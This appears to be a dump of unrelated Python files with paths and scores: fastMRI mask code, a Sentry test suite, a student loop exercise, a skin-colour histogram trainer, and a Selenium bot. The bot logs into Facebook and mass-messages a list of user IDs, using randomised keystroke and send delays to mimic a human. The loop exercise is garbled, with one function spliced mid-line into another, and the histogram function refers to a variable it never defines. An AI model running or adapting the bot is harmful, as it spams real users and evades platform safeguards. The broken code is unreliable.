elif mask_type_str == "adaptive_equispaced_fraction":
return EquispacedMaskFractionFunc(
center_fractions, accelerations, skip_low_freqs
)
else:
raise ValueError(f"{mask_type_str} not supported")
class EquispacedMaskFractionFunc(MaskFunc):
"""
Equispaced mask with strictly exact acceleration matching.
The mask selects a subset of columns from the input k-space data. If the
k-space data has N columns, the mask picks out:
1. N_low_freqs = (N * center_fraction) columns in the center
corresponding to low-frequencies.
2. The other columns are selected with equal spacing at a proportion
that reaches the desired acceleration rate taking into consideration
the number of low frequencies. This ensures that the expected number
of columns selected is equal to (N / acceleration)
It is possible to use multiple center_fractions and accelerations, in which
case one possible (center_fraction, acceleration) is chosen uniformly at
random each time the EquispacedMaskFunc object is called.
Note that this function may not give equispaced samples (documented in
https://github.com/facebookresearch/fastMRI/issues/54), which will require
modifications to standard GRAPPA approaches. Nonetheless, this aspect of
the function has been preserved to match the public multicoil data.
"""
def __init__(
self,
center_fractions: Sequence[float],
accelerations: Sequence[int],
skip_low_freqs: bool = False,
):
"""
Args:
center_fractions: Fraction of low-frequency columns to be retained.
If multiple values are provided, then one of these numbers is
chosen uniformly each time.
accelerations: Amount of under-sampling. This should have the same
length as center_fractions. If multiple values are provided,
then one of these is chosen uniformly each time.
skip_low_freqs: Whether to skip already sampled low-frequency lines
for the purposes of determining where equispaced lines should
be. Set this `True` to guarantee the same number of sampled
lines for all masks with a given (acceleration,
center_fraction) setting.
"""
super().__init__(center_fractions, accelerations)
self.skip_low_freqs = skip_low_freqs
def calculate_acceleration_mask(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Number of low frequencies. Used to adjust mask
to exactly match the target acceleration.
Returns:
A mask for the high spatial frequencies of k-space.
"""
mask = np.zeros(num_cols)
pad = (num_cols - num_low_frequencies + 1) // 2
# determine acceleration rate by adjusting for the number of low frequencies
adjusted_accel = (acceleration * (num_low_frequencies - num_cols)) / (
num_low_frequencies * acceleration - num_cols
)
offset = self.rng.randint(0, round(adjusted_accel) - 1)
# Select samples from the remaining columns
accel_samples = np.arange(
offset, num_cols - num_low_frequencies - 1, adjusted_accel
)
accel_samples = np.around(accel_samples).astype(int)
skip = (
num_low_frequencies # Skip low freq AND optionally lines right next to it
)
for sample in accel_samples:
if sample < pad:
mask[sample] = True
else: # sample is further than center, so skip low_freqs
mask[int(sample + skip)] = True
return mask | fastmri_examples/adaptive_varnet/subsample.py | from typing import Optional, Sequence
import numpy as np
from fastmri.data.subsample import MaskFunc, RandomMaskFunc
def create_mask_for_mask_type(
mask_type_str: str,
center_fractions: Sequence[float],
accelerations: Sequence[int],
skip_low_freqs: bool,
) -> MaskFunc:
"""
Creates a mask of the specified type.
Args:
center_fractions: What fraction of the center of k-space to include.
accelerations: What accelerations to apply.
skip_low_freqs: Whether to skip already sampled low-frequency lines
for the purposes of determining where equispaced lines should be.
Set this `True` to guarantee the same number of sampled lines for
all masks with a given (acceleration, center_fraction) setting.
Returns:
A mask func for the target mask type.
"""
if mask_type_str == "random":
return RandomMaskFunc(center_fractions, accelerations)
elif mask_type_str == "adaptive_equispaced_fraction":
return EquispacedMaskFractionFunc(
center_fractions, accelerations, skip_low_freqs
)
else:
raise ValueError(f"{mask_type_str} not supported")
class EquispacedMaskFractionFunc(MaskFunc):
"""
Equispaced mask with strictly exact acceleration matching.
The mask selects a subset of columns from the input k-space data. If the
k-space data has N columns, the mask picks out:
1. N_low_freqs = (N * center_fraction) columns in the center
corresponding to low-frequencies.
2. The other columns are selected with equal spacing at a proportion
that reaches the desired acceleration rate taking into consideration
the number of low frequencies. This ensures that the expected number
of columns selected is equal to (N / acceleration)
It is possible to use multiple center_fractions and accelerations, in which
case one possible (center_fraction, acceleration) is chosen uniformly at
random each time the EquispacedMaskFunc object is called.
Note that this function may not give equispaced samples (documented in
https://github.com/facebookresearch/fastMRI/issues/54), which will require
modifications to standard GRAPPA approaches. Nonetheless, this aspect of
the function has been preserved to match the public multicoil data.
"""
def __init__(
self,
center_fractions: Sequence[float],
accelerations: Sequence[int],
skip_low_freqs: bool = False,
):
"""
Args:
center_fractions: Fraction of low-frequency columns to be retained.
If multiple values are provided, then one of these numbers is
chosen uniformly each time.
accelerations: Amount of under-sampling. This should have the same
length as center_fractions. If multiple values are provided,
then one of these is chosen uniformly each time.
skip_low_freqs: Whether to skip already sampled low-frequency lines
for the purposes of determining where equispaced lines should
be. Set this `True` to guarantee the same number of sampled
lines for all masks with a given (acceleration,
center_fraction) setting.
"""
super().__init__(center_fractions, accelerations)
self.skip_low_freqs = skip_low_freqs
def calculate_acceleration_mask(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Number of low frequencies. Used to adjust mask
to exactly match the target acceleration.
Returns:
A mask for the high spatial frequencies of k-space.
"""
mask = np.zeros(num_cols)
pad = (num_cols - num_low_frequencies + 1) // 2
# determine acceleration rate by adjusting for the number of low frequencies
adjusted_accel = (acceleration * (num_low_frequencies - num_cols)) / (
num_low_frequencies * acceleration - num_cols
)
offset = self.rng.randint(0, round(adjusted_accel) - 1)
# Select samples from the remaining columns
accel_samples = np.arange(
offset, num_cols - num_low_frequencies - 1, adjusted_accel
)
accel_samples = np.around(accel_samples).astype(int)
skip = (
num_low_frequencies # Skip low freq AND optionally lines right next to it
)
for sample in accel_samples:
if sample < pad:
mask[sample] = True
else: # sample is further than center, so skip low_freqs
mask[int(sample + skip)] = True
return mask | 0.980243 | 0.831554 |
from selenium import webdriver
from keyboard import press
from selenium.webdriver.common.keys import Keys
import time
import pandas as pd
import keyboard
import random
pause_pt =False # setpause value to false
def pause_func(): #function to stop loop
global pause_pt
pause_pt = True #set pause value to true
data = pd.read_csv("ids.csv",names=['B']) #reading the csv file which contains the facebook ids(B column)
ids_targets= data.B.tolist() #alternatively you can make a list of targets = [18882121112,12232442423..]
print(ids_targets)
x = "facebook_email"
y = "facebook_password"
driver = webdriver.Chrome()
driver.get('https://www.facebook.com/')
email = driver.find_element_by_css_selector("input[name=email]")
email.send_keys(x)
password = driver.find_element_by_css_selector("input[name=pass]")
password.send_keys(y)
login_button = driver.find_element_by_css_selector("input[type=submit]")
login_button.click()
id_dom = ["js_f","js_g","js_h","js_i",
"js_j", "js_k","js_l","js_m","js_n","js_o","js_p","js_q","js_r",
"js_s","js_t","js_u","js_v","js_w","js_x","js_y","js_z","js_a","js_b","js_c","js_d","js_e","js_1","js_2","js_3",
"js_4","js_5","js_6","js_7","js_8","js_9","js_10","js_0",
] # list of ids to iterate
# id of message box in messanger changes over requests
number = 1
text = "your message"
for id_target in ids_targets:
msg_url ='https://www.facebook.com/messages/t/' + id_target
keyboard.add_hotkey("ctrl+alt", lambda: pause_func()) #calling pause_func by clicking "ctrl+alt"
if pause_pt == True: #it will break the loop
break
try:
driver.get(msg_url)
driver.implicitly_wait(5)
msg = driver.find_element_by_css_selector('div._kmc._7kpg.navigationFocus') #finding the element of msg_box of class "_kmc _7kpg navigationFocus"
for id_logic in id_dom: #iterating over ids of the msg_box since it changes everytime / most of the time
try:
msg_text = msg.find_element_by_id(id_logic) #finding the element of the msg
for letters in text:
msg_text.send_keys(letters) #sending each letter of the target msg
time.sleep(random.uniform(0.1, 0.3)) #sending each letter at a time span to slow down the speed of typing
msg_text.send_keys(Keys.ENTER)
ids_targets.remove(id_target) #remove the id if msg is sent
print("msg sent to\t",id_target)
break
except:
print("error with\t",id_logic)
except:
print("Skiping")
print(number,"-----------------------------------------Msg_automate_kaux---------------------------------------------")
number+=1
time.sleep(random.uniform(3.2,4.5)) #sleeping after sending a msg
pd.DataFrame(ids_targets).to_csv("ids.csv",mode='w') #saving the remaining facebook_ids | msg_automation.py | from selenium import webdriver
from keyboard import press
from selenium.webdriver.common.keys import Keys
import time
import pandas as pd
import keyboard
import random
pause_pt =False # setpause value to false
def pause_func(): #function to stop loop
global pause_pt
pause_pt = True #set pause value to true
data = pd.read_csv("ids.csv",names=['B']) #reading the csv file which contains the facebook ids(B column)
ids_targets= data.B.tolist() #alternatively you can make a list of targets = [18882121112,12232442423..]
print(ids_targets)
x = "facebook_email"
y = "facebook_password"
driver = webdriver.Chrome()
driver.get('https://www.facebook.com/')
email = driver.find_element_by_css_selector("input[name=email]")
email.send_keys(x)
password = driver.find_element_by_css_selector("input[name=pass]")
password.send_keys(y)
login_button = driver.find_element_by_css_selector("input[type=submit]")
login_button.click()
id_dom = ["js_f","js_g","js_h","js_i",
"js_j", "js_k","js_l","js_m","js_n","js_o","js_p","js_q","js_r",
"js_s","js_t","js_u","js_v","js_w","js_x","js_y","js_z","js_a","js_b","js_c","js_d","js_e","js_1","js_2","js_3",
"js_4","js_5","js_6","js_7","js_8","js_9","js_10","js_0",
] # list of ids to iterate
# id of message box in messanger changes over requests
number = 1
text = "your message"
for id_target in ids_targets:
msg_url ='https://www.facebook.com/messages/t/' + id_target
keyboard.add_hotkey("ctrl+alt", lambda: pause_func()) #calling pause_func by clicking "ctrl+alt"
if pause_pt == True: #it will break the loop
break
try:
driver.get(msg_url)
driver.implicitly_wait(5)
msg = driver.find_element_by_css_selector('div._kmc._7kpg.navigationFocus') #finding the element of msg_box of class "_kmc _7kpg navigationFocus"
for id_logic in id_dom: #iterating over ids of the msg_box since it changes everytime / most of the time
try:
msg_text = msg.find_element_by_id(id_logic) #finding the element of the msg
for letters in text:
msg_text.send_keys(letters) #sending each letter of the target msg
time.sleep(random.uniform(0.1, 0.3)) #sending each letter at a time span to slow down the speed of typing
msg_text.send_keys(Keys.ENTER)
ids_targets.remove(id_target) #remove the id if msg is sent
print("msg sent to\t",id_target)
break
except:
print("error with\t",id_logic)
except:
print("Skiping")
print(number,"-----------------------------------------Msg_automate_kaux---------------------------------------------")
number+=1
time.sleep(random.uniform(3.2,4.5)) #sleeping after sending a msg
pd.DataFrame(ids_targets).to_csv("ids.csv",mode='w') #saving the remaining facebook_ids | 0.165762 | 0.056288 |
from __future__ import absolute_import
import six
from django.core import mail
from sentry.mail.actions import ActionTargetType, NotifyEmailAction, NotifyEmailForm
from sentry.models import OrganizationMember, OrganizationMemberTeam, Rule
from sentry.testutils import TestCase
from sentry.testutils.cases import RuleTestCase
from sentry.tasks.post_process import post_process_group
from sentry.testutils.helpers.datetime import iso_format, before_now
class NotifyEmailFormTest(TestCase):
TARGET_TYPE_KEY = "targetType"
TARGET_IDENTIFIER_KEY = "targetIdentifier"
def setUp(self):
super(NotifyEmailFormTest, self).setUp()
self.user = self.create_user(email="<EMAIL>", is_active=True)
self.user2 = self.create_user(email="<EMAIL>", is_active=True)
self.inactive_user = self.create_user(email="<EMAIL>", is_active=False)
organization = self.create_organization(owner=self.user)
self.team = self.create_team(organization=organization)
self.team_not_in_project = self.create_team(organization=organization)
self.project = self.create_project(name="Test", teams=[self.team])
OrganizationMemberTeam.objects.create(
organizationmember=OrganizationMember.objects.get(
user=self.user, organization=organization
),
team=self.team,
)
self.create_member(user=self.user2, organization=organization, teams=[self.team])
self.create_member(
user=self.inactive_user,
organization=organization,
teams=[self.team, self.team_not_in_project],
)
def form_from_json(self, json):
return NotifyEmailForm(self.project, json)
def form_from_values(self, target_type_value, target_id=None):
json = {self.TARGET_TYPE_KEY: target_type_value}
if target_id:
json[self.TARGET_IDENTIFIER_KEY] = target_id
return self.form_from_json(json)
def test_validate_empty_fail(self):
form = self.form_from_json({})
assert not form.is_valid()
def test_validate_none_fail(self):
form = self.form_from_json(None)
assert not form.is_valid()
def test_validate_malformed_json_fail(self):
form = self.form_from_json({"notTheRightK3yName": ActionTargetType.ISSUE_OWNERS.value})
assert not form.is_valid()
def test_validate_invalid_target_type_fail(self):
form = self.form_from_values("TheLegend27")
assert not form.is_valid()
def test_validate_issue_owners(self):
form = self.form_from_values(ActionTargetType.ISSUE_OWNERS.value)
assert form.is_valid()
def test_validate_team(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team.id)
assert form.is_valid()
def test_validate_team_not_in_project_fail(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team_not_in_project.id)
assert not form.is_valid()
def test_validate_user(self):
for u in [self.user, self.user2]:
form = self.form_from_values(ActionTargetType.MEMBER.value, u.id)
assert form.is_valid()
def test_validate_inactive_user_fail(self):
form = self.form_from_values(ActionTargetType.MEMBER.value, self.inactive_user)
assert not form.is_valid()
def test_none_target_identifier(self):
json = {self.TARGET_TYPE_KEY: ActionTargetType.ISSUE_OWNERS.value}
json[self.TARGET_IDENTIFIER_KEY] = "None"
form = self.form_from_json(json)
assert form.is_valid()
class NotifyEmailTest(RuleTestCase):
rule_cls = NotifyEmailAction
def test_simple(self):
event = self.get_event()
rule = self.get_rule()
results = list(rule.after(event=event, state=self.get_state()))
assert len(results) == 1
def test_full_integration(self):
one_min_ago = iso_format(before_now(minutes=1))
event = self.store_event(
data={
"message": "hello",
"exception": {"type": "Foo", "value": "uh oh"},
"level": "error",
"timestamp": one_min_ago,
},
project_id=self.project.id,
assert_no_errors=False,
)
action_data = {
"id": "sentry.mail.actions.NotifyEmailAction",
"targetType": "Member",
"targetIdentifier": six.text_type(self.user.id),
}
condition_data = {"id": "sentry.rules.conditions.first_seen_event.FirstSeenEventCondition"}
Rule.objects.filter(project=event.project).delete()
Rule.objects.create(
project=event.project, data={"conditions": [condition_data], "actions": [action_data]}
)
with self.tasks():
post_process_group(
event=event, is_new=True, is_regression=False, is_new_group_environment=False
)
assert len(mail.outbox) == 1
sent = mail.outbox[0]
assert sent.to == [self.user.email]
assert "uh oh" in sent.subject | tests/sentry/mail/test_actions.py | from __future__ import absolute_import
import six
from django.core import mail
from sentry.mail.actions import ActionTargetType, NotifyEmailAction, NotifyEmailForm
from sentry.models import OrganizationMember, OrganizationMemberTeam, Rule
from sentry.testutils import TestCase
from sentry.testutils.cases import RuleTestCase
from sentry.tasks.post_process import post_process_group
from sentry.testutils.helpers.datetime import iso_format, before_now
class NotifyEmailFormTest(TestCase):
TARGET_TYPE_KEY = "targetType"
TARGET_IDENTIFIER_KEY = "targetIdentifier"
def setUp(self):
super(NotifyEmailFormTest, self).setUp()
self.user = self.create_user(email="<EMAIL>", is_active=True)
self.user2 = self.create_user(email="<EMAIL>", is_active=True)
self.inactive_user = self.create_user(email="<EMAIL>", is_active=False)
organization = self.create_organization(owner=self.user)
self.team = self.create_team(organization=organization)
self.team_not_in_project = self.create_team(organization=organization)
self.project = self.create_project(name="Test", teams=[self.team])
OrganizationMemberTeam.objects.create(
organizationmember=OrganizationMember.objects.get(
user=self.user, organization=organization
),
team=self.team,
)
self.create_member(user=self.user2, organization=organization, teams=[self.team])
self.create_member(
user=self.inactive_user,
organization=organization,
teams=[self.team, self.team_not_in_project],
)
def form_from_json(self, json):
return NotifyEmailForm(self.project, json)
def form_from_values(self, target_type_value, target_id=None):
json = {self.TARGET_TYPE_KEY: target_type_value}
if target_id:
json[self.TARGET_IDENTIFIER_KEY] = target_id
return self.form_from_json(json)
def test_validate_empty_fail(self):
form = self.form_from_json({})
assert not form.is_valid()
def test_validate_none_fail(self):
form = self.form_from_json(None)
assert not form.is_valid()
def test_validate_malformed_json_fail(self):
form = self.form_from_json({"notTheRightK3yName": ActionTargetType.ISSUE_OWNERS.value})
assert not form.is_valid()
def test_validate_invalid_target_type_fail(self):
form = self.form_from_values("TheLegend27")
assert not form.is_valid()
def test_validate_issue_owners(self):
form = self.form_from_values(ActionTargetType.ISSUE_OWNERS.value)
assert form.is_valid()
def test_validate_team(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team.id)
assert form.is_valid()
def test_validate_team_not_in_project_fail(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team_not_in_project.id)
assert not form.is_valid()
def test_validate_user(self):
for u in [self.user, self.user2]:
form = self.form_from_values(ActionTargetType.MEMBER.value, u.id)
assert form.is_valid()
def test_validate_inactive_user_fail(self):
form = self.form_from_values(ActionTargetType.MEMBER.value, self.inactive_user)
assert not form.is_valid()
def test_none_target_identifier(self):
json = {self.TARGET_TYPE_KEY: ActionTargetType.ISSUE_OWNERS.value}
json[self.TARGET_IDENTIFIER_KEY] = "None"
form = self.form_from_json(json)
assert form.is_valid()
class NotifyEmailTest(RuleTestCase):
rule_cls = NotifyEmailAction
def test_simple(self):
event = self.get_event()
rule = self.get_rule()
results = list(rule.after(event=event, state=self.get_state()))
assert len(results) == 1
def test_full_integration(self):
one_min_ago = iso_format(before_now(minutes=1))
event = self.store_event(
data={
"message": "hello",
"exception": {"type": "Foo", "value": "uh oh"},
"level": "error",
"timestamp": one_min_ago,
},
project_id=self.project.id,
assert_no_errors=False,
)
action_data = {
"id": "sentry.mail.actions.NotifyEmailAction",
"targetType": "Member",
"targetIdentifier": six.text_type(self.user.id),
}
condition_data = {"id": "sentry.rules.conditions.first_seen_event.FirstSeenEventCondition"}
Rule.objects.filter(project=event.project).delete()
Rule.objects.create(
project=event.project, data={"conditions": [condition_data], "actions": [action_data]}
)
with self.tasks():
post_process_group(
event=event, is_new=True, is_regression=False, is_new_group_environment=False
)
assert len(mail.outbox) == 1
sent = mail.outbox[0]
assert sent.to == [self.user.email]
assert "uh oh" in sent.subject | 0.44071 | 0.275501 |
# template for calling functions in another file
def print_function():
print("I'm in another file :)")
def while_loop(max_number=10):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i += 1
print(my_list)
def while_loop2(neg_number):
my_list1 = []
i = 1
while i >= neg_number:
my_list1.append(i)
i -= 1
print(my_list1)
def while_loop3(max_number):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i -= 1
accum = 0
for w in my_list:
accum = accum + w
my_list.append(accum)
print(my_list)
def while_loop4(max_number):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i -= 1
accum = 0
for w in my_list:
accum =def while_loop3(max_number):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i -= 1
accum = 0
for w in my_list:
accum = accum + w accum + w
if i < -12 or i > 12:
break
my_list.append(accum)
print(my_list)
'''def while_loop5(max_number, even):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i += 1
accum = 0
for w in my_list:
accum = accum + w
if i < -12 or i > 12:
break
elif i % 2 == 0:
i += 1
continue
my_list.append(accum)
print(my_list)
'''
def while_loop5(max_number=10, even=False):
my_list = []
accum = 0
i = 1
if max_number < 0:
while i >= max_number:
if even and i % 2 == 1:
i -= 1
continue
my_list.append(i)
accum -= i
i -= 1
if i < -12:
break
else:
while i <= max_number:
if even and i % 2 == 1:
i += 1
continue
my_list.append(i)
accum += i
i += 1
if i > 12:
break
my_list.append(accum)
print(my_list)
def while_loop6(max_number=10, even=False, boolean="False"):
my_list = []
accum = 0
factorial = 1
i = 1
if max_number < 0:
while i >= max_number:
if even and i % 2 == 1:
i -= 1
continue
my_list.append(i)
accum -= i
i -= 1
if i < -12:
break
elif max_number > 0:
while i <= max_number:
my_list = my_list + [i]
factorial = factorial * i
accum += i
i += 1
if i > 12:
break
else:
while i <= max_number:
if even and i % 2 == 1:
i += 1
continue
my_list.append(i)
accum += i
i += 1
if i > 12:
break
my_list.append(accum)
my_list.append(factorial)
print(my_list) | Lab5/functions.py |
# template for calling functions in another file
def print_function():
print("I'm in another file :)")
def while_loop(max_number=10):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i += 1
print(my_list)
def while_loop2(neg_number):
my_list1 = []
i = 1
while i >= neg_number:
my_list1.append(i)
i -= 1
print(my_list1)
def while_loop3(max_number):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i -= 1
accum = 0
for w in my_list:
accum = accum + w
my_list.append(accum)
print(my_list)
def while_loop4(max_number):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i -= 1
accum = 0
for w in my_list:
accum =def while_loop3(max_number):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i -= 1
accum = 0
for w in my_list:
accum = accum + w accum + w
if i < -12 or i > 12:
break
my_list.append(accum)
print(my_list)
'''def while_loop5(max_number, even):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i += 1
accum = 0
for w in my_list:
accum = accum + w
if i < -12 or i > 12:
break
elif i % 2 == 0:
i += 1
continue
my_list.append(accum)
print(my_list)
'''
def while_loop5(max_number=10, even=False):
my_list = []
accum = 0
i = 1
if max_number < 0:
while i >= max_number:
if even and i % 2 == 1:
i -= 1
continue
my_list.append(i)
accum -= i
i -= 1
if i < -12:
break
else:
while i <= max_number:
if even and i % 2 == 1:
i += 1
continue
my_list.append(i)
accum += i
i += 1
if i > 12:
break
my_list.append(accum)
print(my_list)
def while_loop6(max_number=10, even=False, boolean="False"):
my_list = []
accum = 0
factorial = 1
i = 1
if max_number < 0:
while i >= max_number:
if even and i % 2 == 1:
i -= 1
continue
my_list.append(i)
accum -= i
i -= 1
if i < -12:
break
elif max_number > 0:
while i <= max_number:
my_list = my_list + [i]
factorial = factorial * i
accum += i
i += 1
if i > 12:
break
else:
while i <= max_number:
if even and i % 2 == 1:
i += 1
continue
my_list.append(i)
accum += i
i += 1
if i > 12:
break
my_list.append(accum)
my_list.append(factorial)
print(my_list) | 0.134037 | 0.182044 |
import logging
import os
import sys
try:
import cPickle as pickle
except ImportError: # Python 3.x
import pickle
import colorlog
import numpy as np
from PIL import Image
logger = logging.getLogger()
logger.setLevel(colorlog.colorlog.logging.INFO)
handler = colorlog.StreamHandler()
handler.setFormatter(colorlog.ColoredFormatter())
logger.addHandler(handler)
# logger.debug("Debug message")
# logger.info("Information message")
# logger.warning("Warning message")
# logger.error("Error message")
# logger.critical("Critical message")
np.set_printoptions(threshold=sys.maxsize)
np.set_printoptions(linewidth=10000)
script_dir = os.path.dirname(__file__)
training_data_dir = os.path.join(
script_dir, "histogram_training_images", "sfa", "SKIN", "5"
)
# training_data_dir = os.path.join(script_dir,
# "histogram_training_images",
# "sfa_small_test")
hist_output_dir = os.path.join(script_dir, "histogram_data")
def img2hists(img_path, hist_rgb={}, hist_hsv={}, total_pixels=0):
"""Given a Pillow image, return the number of pixels in it, and two
dictionaries, containing the histogram data of the image as an RGB
file and an HSV file respectively.
By default it gives dictionaries for just the current image, but if
you want to collect information for a sequence of images you can pass
it non-empty dictionaries for hist_rgb and hist_hsv."""
image_array_rgb = np.array(Image.open(img).convert("RGB"))
image_array_hsv = np.array(Image.open(img).convert("HSV"))
total_pixels += image_array_rgb.shape[0] * image_array_rgb.shape[1]
for i in range(0, image_array_rgb.shape[0]):
for j in range(0, image_array_rgb.shape[1]):
rgb = (
image_array_rgb[i, j, 0],
image_array_rgb[i, j, 1],
image_array_rgb[i, j, 2],
)
hsv = (
image_array_hsv[i, j, 0],
image_array_hsv[i, j, 1],
image_array_hsv[i, j, 2],
)
if rgb in hist_rgb:
hist_rgb[rgb] += 1
else:
hist_rgb[rgb] = 1
if hsv in hist_hsv:
hist_hsv[hsv] += 1
else:
hist_hsv[hsv] = 1
return (total_pixels, hist_rgb, hist_hsv)
def slice_hist(hist):
hist_xy = dict()
hist_xz = dict()
hist_yz = dict()
for key in hist.keys():
if (key[0], key[1]) in hist_xy:
hist_xy[(key[0], key[1])] += hist[key]
else:
hist_xy[(key[0], key[1])] = hist[key]
if (key[0], key[2]) in hist_xz:
hist_xz[(key[0], key[2])] += hist[key]
else:
hist_xz[(key[0], key[2])] = hist[key]
if (key[1], key[2]) in hist_yz:
hist_yz[(key[1], key[2])] += hist[key]
else:
hist_yz[(key[1], key[2])] = hist[key]
logger.debug("XY hist created - {}".format(hist_xy))
logger.debug("XZ hist created - {}".format(hist_xz))
logger.debug("YZ hist created - {}".format(hist_yz))
return (hist_xy, hist_xz, hist_yz)
if __name__ == "__main__":
# Change this if you want more or fewer logging messages.
logger.info("<NAME> - EECS 332, MP 4 - Histogram training module")
logger.info("-" * 80)
big_total_pixels = 0
big_hist_rgb = {}
big_hist_hsv = {}
logger.warning(
"Constructing un-normalized histograms for directory (this might take a while): {}".format(
training_data_dir
)
)
for path, subdirs, files in os.walk(training_data_dir):
for name in files:
img = os.path.join(path, name)
logger.debug("Now analyzing {}".format(img))
logger.debug("Constructing individual for {}".format(img))
(img_total_pixels, img_hist_rgb, img_hist_hsv) = img2hists(img)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total pixels :: {}".format(img_total_pixels))
logger.debug("RGB individual histogram dict :: {}".format(img_hist_rgb))
logger.debug("HSV individual histogram dict :: {}".format(img_hist_hsv))
logger.debug("Adding to cumulative histogram data for {}".format(img))
(big_total_pixels, big_hist_rgb, big_hist_hsv) = img2hists(
img, big_hist_rgb, big_hist_hsv, big_total_pixels
)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total cumulative pixels :: {}".format(big_total_pixels))
logger.debug("RGB cumulative histogram dict :: {}".format(big_hist_rgb))
logger.debug("HSV cumulative histogram dict :: {}".format(big_hist_hsv))
logger.debug(" -> File competed: {}".format(img))
logger.info(
"Non-normalized histograms have been constructed for directory: {}".format(
training_data_dir
)
)
logger.info("Constructiong 2-tuple slices of RGB and HSV hists.")
(big_hist_rg, big_hist_rb, big_hist_gb) = slice_hist(big_hist_rgb)
(big_hist_hs, big_hist_hv, big_hist_sv) = slice_hist(big_hist_hsv)
rgb_count_check = 0
for key in big_hist_rgb.keys():
rgb_count_check += big_hist_rgb[key]
rg_count_check = 0
for key in big_hist_rg.keys():
rg_count_check += big_hist_rg[key]
rb_count_check = 0
for key in big_hist_rb.keys():
rb_count_check += big_hist_rb[key]
gb_count_check = 0
for key in big_hist_gb.keys():
gb_count_check += big_hist_gb[key]
hs_count_check = 0
for key in big_hist_hs.keys():
hs_count_check += big_hist_hs[key]
hv_count_check = 0
for key in big_hist_hv.keys():
hv_count_check += big_hist_hv[key]
sv_count_check = 0
for key in big_hist_sv.keys():
sv_count_check += big_hist_sv[key]
hsv_count_check = 0
for key in big_hist_hsv.keys():
hsv_count_check += big_hist_hsv[key]
try:
if (
rgb_count_check != hsv_count_check
or rgb_count_check != big_total_pixels
or hsv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("Histogram counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rgb_count_check = {}".format(rgb_count_check))
logger.warning(" -> hsv_count_check = {}".format(hsv_count_check))
try:
if (
hs_count_check != big_total_pixels
or hv_count_check != big_total_pixels
or sv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("HSV 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> hv_count_check = {}".format(hv_count_check))
logger.warning(" -> hs_count_check = {}".format(hs_count_check))
logger.warning(" -> sv_count_check = {}".format(sv_count_check))
try:
if (
rb_count_check != big_total_pixels
or rg_count_check != big_total_pixels
or gb_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("RGB 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rg_count_check = {}".format(rg_count_check))
logger.warning(" -> rb_count_check = {}".format(rb_count_check))
logger.warning(" -> gb_count_check = {}".format(gb_count_check))
logger.info("Pickling non-normalized histogram dicts with 'size' key added.")
big_hist_rgb["size"] = big_total_pixels
big_hist_hsv["size"] = big_total_pixels
big_hist_rg["size"] = big_total_pixels
big_hist_rb["size"] = big_total_pixels
big_hist_gb["size"] = big_total_pixels
big_hist_hs["size"] = big_total_pixels
big_hist_hv["size"] = big_total_pixels
big_hist_sv["size"] = big_total_pixels
rgb_hist_location = os.path.join(hist_output_dir, "hist_rgb.pickle")
hsv_hist_location = os.path.join(hist_output_dir, "hist_hsv.pickle")
rg_hist_location = os.path.join(hist_output_dir, "hist_rg.pickle")
rb_hist_location = os.path.join(hist_output_dir, "hist_rb.pickle")
gb_hist_location = os.path.join(hist_output_dir, "hist_gb.pickle")
hs_hist_location = os.path.join(hist_output_dir, "hist_hs.pickle")
hv_hist_location = os.path.join(hist_output_dir, "hist_hv.pickle")
sv_hist_location = os.path.join(hist_output_dir, "hist_sv.pickle")
with open(rgb_hist_location, "wb") as fp:
pickle.dump(big_hist_rgb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rgb pickled to {}".format(fp))
with open(hsv_hist_location, "wb") as fp:
pickle.dump(big_hist_hsv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hsv pickled to {}".format(fp))
with open(rg_hist_location, "wb") as fp:
pickle.dump(big_hist_rg, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rg pickled to {}".format(fp))
with open(rb_hist_location, "wb") as fp:
pickle.dump(big_hist_rb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rb pickled to {}".format(fp))
with open(gb_hist_location, "wb") as fp:
pickle.dump(big_hist_gb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_gb pickled to {}".format(fp))
with open(hs_hist_location, "wb") as fp:
pickle.dump(big_hist_hs, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hs pickled to {}".format(fp))
with open(hv_hist_location, "wb") as fp:
pickle.dump(big_hist_hv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hv pickled to {}".format(fp))
with open(sv_hist_location, "wb") as fp:
pickle.dump(big_hist_sv, fp, protocol=pickle.HIGHEST_PROTOCOL)
